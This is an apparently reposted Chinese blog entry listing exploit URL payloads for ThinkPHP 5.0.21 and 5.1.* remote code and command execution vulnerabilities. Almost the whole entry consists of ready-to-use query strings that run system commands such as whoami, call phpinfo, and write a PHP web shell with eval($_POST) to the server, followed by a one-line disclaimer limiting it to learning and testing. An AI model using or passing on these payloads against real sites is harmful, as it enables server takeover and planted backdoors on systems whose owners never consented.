ThinkPHP5.0.21&5.1.* 代码执行和命令执行漏洞利用

时间:2019-03-05 21:24:50   收藏:0   阅读:1063

5.0.21

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5.1.*
?s=index/\think\Request/input&filter=phpinfo&data=1

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\Request/input&filter=system&data=whoami

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\template\driver\file/write&cacheFile=md5.inc.php&content=%3C?php%20@eval($_POST[‘c‘]);?%3E

以上EXP仅用于学习、测试,切勿用作其它用途。

 

原文:https://www.cnblogs.com/iAmSoScArEd/p/10479737.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!